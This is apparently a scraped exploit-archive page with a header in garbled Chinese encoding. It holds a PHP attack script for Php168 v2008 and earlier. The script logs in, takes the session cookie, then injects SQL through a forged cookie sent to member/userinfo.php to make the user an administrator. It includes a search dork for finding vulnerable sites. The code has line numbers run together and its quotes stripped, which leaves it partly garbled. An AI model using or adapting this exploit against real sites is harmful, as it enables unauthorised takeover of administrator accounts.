Php168 v2008 Ȩ©

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.<?php2.print_r('3.+---------------------------------------------------------------------------+4.Php168 <= v2008 update user access exploit5.by puret_t6.mail: puretot at gmail dot com7.team: http://www.wolvez.org8.dork: "Powered by PHP168"9.+---------------------------------------------------------------------------+10.');11./**12.* works regardless of php.ini settings13.*/14.if ($argc < 5) {15.print_r('16.+---------------------------------------------------------------------------+17.Usage: php '.$argv[0]. host path user pass18.host:      target server (ip/hostname)19.path:      path to php16820.user:      login username21.pass:      login password22.Example:23.php .$argv[0]. localhost /php168/24.++25.);26.exit;27.}28. 29.error_reporting(7);30.ini_set(max_execution_time, 0);31. 32.$host = $argv[1];33.$path = $argv[2];34.$user = $argv[3];35.$pass = $argv[4];36. 37.$resp = send();38.preg_match(/Set-Cookie:\s(passport=([0-9]{1,4})%09[a-zA-Z0-9%]+)/, $resp, $cookie);39. 40.if ($cookie)41.if (strpos(send(), puret_t) !== false)42.exit(Expoilt Success!\nYou Are Admin Now!\n);43.else44.exit(Exploit Failed!\n);45.else46.exit(Exploit Failed!\n);47. 48.function rands($length = 8)49.{50.$hash = ;51.$chars = ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz;52.$max = strlen($chars) - 1;53.mt_srand((double)microtime() * 1000000);54.for ($i = 0; $i < $length; $i++)55.$hash .= $chars[mt_rand(0, $max)];56. 57.return $hash;58.}59. 60.function send()61.{62.global $host, $path, $user, $pass, $cookie;63. 64.if ($cookie) {65.$cookie[1] .= ;USR=.rands().\t%2b31,groupid=3,introduce=070757265745f74 WHERE uid=$cookie[2]#\t\t;66.$cmd = ;67. 68.$message = POST .$path.member/userinfo.php  HTTP/1.1\r\n;69.$message .= Accept: */*\r\n;70.$message .= Accept-Language: zh-cn\r\n;71.$message .= Content-Type: application/x-www-form-urlencoded\r\n;72.$message .= User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n;73.$message .= CLIENT-IP: ryat\\\r\n;74.$message .= Host: $host\r\n;75.$message .= Content-Length: .strlen($cmd).\r\n;76.$message .= Connection: Close\r\n;77.$message .= Cookie: .$cookie[1].\r\n\r\n;78.$message .= $cmd;79.} else {80.$cmd = username=$user&password=$pass&step=2;81. 82.$message = POST .$path.login.php  HTTP/1.1\r\n;83.$message .= Accept: */*\r\n;84.$message .= Accept-Language: zh-cn\r\n;85.$message .= Content-Type: application/x-www-form-urlencoded\r\n;86.$message .= User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n;87.$message .= Host: $host\r\n;88.$message .= Content-Length: .strlen($cmd).\r\n;89.$message .= Connection: Close\r\n\r\n;90.$message .= $cmd;91.}92. 93.$fp = fsockopen($host, 80);94.fputs($fp, $message);95. 96.$resp = ;97. 98.while ($fp && !feof($fp))99.$resp .= fread($fp, 1024);100. 101.return $resp;102.}103. 104.?>